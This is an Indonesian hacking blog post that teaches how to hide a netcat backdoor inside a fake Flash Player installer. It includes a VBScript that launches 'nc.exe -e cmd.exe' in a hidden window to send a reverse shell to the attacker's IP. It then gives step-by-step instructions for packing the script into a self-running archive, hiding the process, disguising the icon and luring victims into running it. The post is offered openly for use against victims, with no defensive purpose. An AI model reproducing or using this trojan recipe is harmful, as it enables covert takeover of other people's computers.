Home » » Remote Windows Dengan Backdoor exe

Remote Windows Dengan Backdoor exe

Written By PKPD on Senin, 03 Desember 2012 | 13.22

Pada kesempatan ini baso onhacker mau ngeshare mengenai tehnik simple bagaimana mendapat akses remote shell di windows dengan fasilitas netcat di backtrack. Ok baca resepnya terlebih dahulu. Simplenya tutorial ini akan mengajarkan kita untuk menyisipkan program backdoor pada salah satu installer windows, sehingga akan membuka koneksi remot pada saat program terkontaminasi di esekusi oleh korban.

Remote windows with netcat
======================
Target : windows xp1,xp2,xp3,win7,vista
Attacker : Linux Backtrack R2  

Dibutuhkan :
  • Netcat windows version ( download here )
  • Reshacker windows version ( download here )
  • FlashPlayer Installer ( dalam hal ini ane memilih flash player untuk sample.. bisa ente gunakan exe yang lain )
  • winrar ( windows version )
  • Netcat Linux version ( included on backtrack R2 )
  • Script NC-Remote
copas aja bro .. saya males jelasin cara kerja script ini karena kurang ngerijuga bahasa gituan,,brukakakakaka 


Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-saya 4444", null, objConfig, intProcessID)


 
Oke lanjuddd
  • Pertama-tama edit script tadi pake notepad atau apa saja ganti kata-kata ip-saya dengan ip address pada komputer yang akan anda jadikan penyerang. simpan dengan nama baso.vbs


  • Siapkan Program NetCat yang sudah anda download terus bikin sfx archives di gabungkan dengan script yang sudah kamu edit tadi ( baso.vbs )

  • Pilih Advance SFX options tabs terus edit path to extract. Untuk kasus kali ini saya samplekan c:/ Hilangkan centang pada save & restore paths. Dan pada setup program ( run before extraction ) ketikan baso.vbs , agar setelah di extrak nanti baso.vbs akan langsung dieksekusi pada path c:/




Kemudian esekusi rar nya …..
  • Klik run terus ketik di situ iexpress lalu enter …lalu tinggal next-next aja sampe nanti di minta untuk memasukan file-file apa saja yang mau di gabungkan dalam satu install self extraction pada windows.Jangan lupa untuk mencentang hiden proses untuk menipu target . Simpan dengan extention exe
  • Pembuatan self extraction selesai. Langkah terakhir kita ganti icon default dengan icon flash player installer dengan rest hacker.


Ok file backdoor sudah ready. Terserah cara anda untuk memasukan file backdoor tadi ke komputer korban. Bisa lewat bujukan , download atau apa saja sesuai dengan kreasi kamu.
  • Sekarang pada backtrack anda ketikan perintah di bawah ini untuk mengaktifkan nc
  • Kita tinggal menunggu agar korban mengklik backdoor yang sudah ente siapkan tadi …kalo sudah di klik .. sudah dapat di pastikan nc pada terminal akan memulai session remote


heheheh kita berhasil mendapatkan shell akses.. selanjutnya terserah kamu ..
kalo kurang2 ngerti penjelasan saya.. silahkan download video tutorial yang udah saya ikuti di bawah ini.
 

Selamat mencoba dan semoga berhasil
Share this article :
Diposting oleh PKPD di 13.22
Label:

0 komentar:

Speak up your mind

Tell us what you're thinking... !

 
Support : Creating Website | Baso Irwan Sakti Template | Template
Copyright © 2012. Baso Onhacker - All Rights Reserved
Template Created by Creating Website Published by Template
Proudly powered by I'm not hacker